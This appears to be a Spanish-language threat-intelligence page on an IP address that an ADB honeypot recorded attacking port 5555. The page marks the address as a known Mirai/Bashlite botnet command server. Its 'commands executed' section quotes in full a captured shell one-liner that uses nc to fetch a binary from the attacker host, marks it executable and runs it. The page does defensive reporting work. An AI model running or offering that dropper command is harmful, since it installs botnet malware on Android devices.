TROYANOSYVIRUS
Amenaza ActivaBAJO

94.156.152.67

Pais de Origen🇧🇬 BG
Primera Deteccion21/4/2026
Ultima Actividad22/4/2026
ISPInternet Magnate (Pty) Ltd
🎯
36
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
0
Malware

Geolocalizacion

Pais
🇧🇬 BG
Ciudad
Desconocida
ASN
AS214209
ISP
Internet Magnate (Pty) Ltd

Tipos de Ataque

adb_honeypot

Puertos Atacados

5555

Malware Asociado

Sin malware asociado

Comandos Ejecutados

$for dir in /data/local/tmp /tmp /sdcard /mnt/sdcard /storage/emulated/0 /data/cache /dev/shm /data/local /cache; do cd $dir 2>/dev/null && (nc 94.156.152.67 8081 > flexoiu 2>/dev/null || nc -w 30 94.156.152.67 8081 > flexoiu 2>/dev/null || timeout 30 nc 94.156.152.67 8081 > flexoiu 2>/dev/null) && chmod 755 flexoiu && ./flexoiu && break; done6x
$getprop ro.product.device2x

ThreatFox Intelabuse.ch

⚠️SERVIDOR C2 CONOCIDO
Familias de Malware
elf.miraielf.bashlite
Tipos de Amenaza
botnet_cc
Confianza: 100%

Evaluacion de Riesgo

20
/100
BajoMedioAltoCritico